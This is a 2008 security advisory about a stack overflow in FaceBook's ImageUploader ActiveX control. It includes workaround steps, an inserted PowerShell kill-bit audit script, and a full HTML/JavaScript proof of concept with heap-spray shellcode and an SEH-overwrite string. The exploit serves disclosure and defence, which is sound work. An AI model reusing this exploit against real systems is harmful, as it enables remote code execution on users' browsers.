[NT] FaceBook ImageUploader OCX Stack Buffer Overflow Vulnerability
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 13 Feb 2008 13:48:01 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
FaceBook ImageUploader OCX Stack Buffer Overflow Vulnerability
------------------------------------------------------------------------
SUMMARY
FaceBook is the world's largest social network, with about 60 million
users. MC Group has discovered a critical vulnerability in FaceBook's
Image Uploader. The vulnerability allows a remote attacker to reliably
overwrite the entire stack, including the SEH handler, and execute
arbitrary code in the context of the user running Internet Explorer.
DETAILS
Vulnerable Systems:
* FaceBook Image Uploader version 5.0.14.0
When assigning a value to any string type attribute of the ImageUploader
class, the value is copied into a fixed size buffer on the stack. As there
is no length validation imposed prior to the copying function, the
stack-based buffer can be overflowed by whatever is passed into the
attribute.
The "ImageUploader4.1.OCX" module is compiled with the "/GS" flag,
therefore there is a security cookie protection. This protection can be
bypassed by overwriting the SEH handler.
On XP SP2 systems, *almost* all modules used by Internet Explorer are
compiled with SafeSEH, so exploiting the vulnerability requires an
unprotected module such as LPK.DLL. On systems with a non-executable
stack, the protection can also be bypassed with the classic
return-to-libc method, returning into VirtualProtect.
To achieve exploitation across all versions of Windows, it is possible to
"spray" the heap and jump to a constant chosen address. With this method,
however, an attacker will not execute code on systems with software DEP
enabled for iexplore.exe.
Workaround:
To work around this vulnerability, if you are not actively using
FaceBook's Image Uploader, you can uninstall the ActiveX control from the
command line:
"regsvr32 /u %windir%\downlo~1\ImageUploader4.1.OCX"
Or set the kill bit so the ActiveX control cannot be created under
Internet Explorer:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}
"Compatibility Flags"=DWORD:0x400
By un-registering this ActiveX control, uploading files to FaceBook with
the Image Uploader will no longer be possible, thereby mitigating this
vulnerability.
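As an added example (not part of the advisory), the following PowerShell script audits a Windows host for the ImageUploader control and applies the kill-bit workaround described above. The CLSID, the 0x400 flag value and the registry path come from the advisory; the function names are this example's own.

```powershell
# Added example, not from the advisory: audit and apply the kill-bit workaround
# for the FaceBook ImageUploader ActiveX control. Run from an elevated prompt;
# writes under HKLM require administrator rights.
$Clsid     = '{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}'   # from the advisory
$KillBit   = 0x400                                      # "Compatibility Flags" kill bit
$CompatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

function Get-ImageUploaderStatus {
    # HKCR\CLSID\{...}\InprocServer32 exists only while the OCX is registered;
    # its (default) value is the path regsvr32 recorded.
    $inproc = Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid\InprocServer32" `
                               -ErrorAction SilentlyContinue
    $flags  = (Get-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' `
                               -ErrorAction SilentlyContinue).'Compatibility Flags'
    [pscustomobject]@{
        Registered  = [bool]$inproc
        OcxPath     = if ($inproc) { $inproc.'(default)' } else { $null }
        CompatFlags = $flags
        KillBitSet  = (([int]$flags -band $KillBit) -eq $KillBit)
    }
}

function Set-ImageUploaderKillBit {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if (-not (Test-Path $CompatKey)) { New-Item -Path $CompatKey -Force | Out-Null }
    $current = (Get-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' `
                                -ErrorAction SilentlyContinue).'Compatibility Flags'
    # OR the kill bit into whatever flags are already present instead of overwriting them.
    $new = [int]$current -bor $KillBit
    if ($PSCmdlet.ShouldProcess($CompatKey, ("set Compatibility Flags to 0x{0:X}" -f $new))) {
        Set-ItemProperty -Path $CompatKey -Name 'Compatibility Flags' -Value $new -Type DWord
    }
}

$before = Get-ImageUploaderStatus
$before | Format-List
if ($before.Registered -and -not $before.KillBitSet) {
    Set-ImageUploaderKillBit          # add -WhatIf to preview the registry write
    Get-ImageUploaderStatus | Format-List
}
```

Unregistering with regsvr32 /u, as the advisory shows, removes the CLSID registration; the kill bit additionally stops Internet Explorer from instantiating the control even if it is registered again later.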
Proof Of Concept (also available at http://www.Mc-Grp.biz/security/facebook/poc.htm):
<html>
<head>
<object id="target"
classid="clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0"></object>
</head>
<body>
<script>
var shellcode = unescape("%u0D0D%u0D0D%u9090%u9090"+ // Windows Execute Command (calc)
"%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+
"%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+
"%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+
"%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+
"%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+
"%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+
"%u685f%ufe98%u0e8a%uff57%u63e7%u6c61%u0063");
var address = 0x0d0d0d0d;
var block_size = 0x400000;
var blocks = (address - block_size) / block_size;
var spray = unescape("%u0D0D%u0D0D");
var tmp = unescape("%u0D0D%u0D0D");
var tmp_size = 1044;
while((spray.length * 2) < block_size) spray += spray;
spray = spray.substring(0, block_size - shellcode.length);
memory = new Array();
for(i = 0; i < blocks; i++) memory[i] = spray + shellcode;
while(tmp.length < (tmp_size * 2)) tmp += tmp;
tmp = tmp.substring(0, tmp_size);
var size = 131;
var z = Array(size);
for (i=0; i<size; i++) {
z[i] = unescape("%u0d0d%u0d0d");
}
var size = 131;
var z2 = Array(size);
for (i=0; i<size; i++) {
z2[i] = unescape("%u0d0d%u0d0d");
}
//' 0x7c914ff1 pop esi, pop ebp, retn 14 lpk.dll NO SAFE SEH
target.FileMask=z.join('') + unescape("%uebFF%uebFF") +
unescape("%u4ff1%u7c91") + z2.join('') + z2.join('') + z2.join('') +
z2.join('') + z2.join('') + z2.join('') + z2.join('') + z2.join('') +
z2.join('') + z2.join('') + z2.join('') + z2.join('') + z2.join('') +
z2.join('') + tmp.substr(0,1) // + String(2000, unescape("%uffff"))
</script>
</body>
</html>
ADDITIONAL INFORMATION
The information has been provided by Rafel Ivgi, "The-Insider".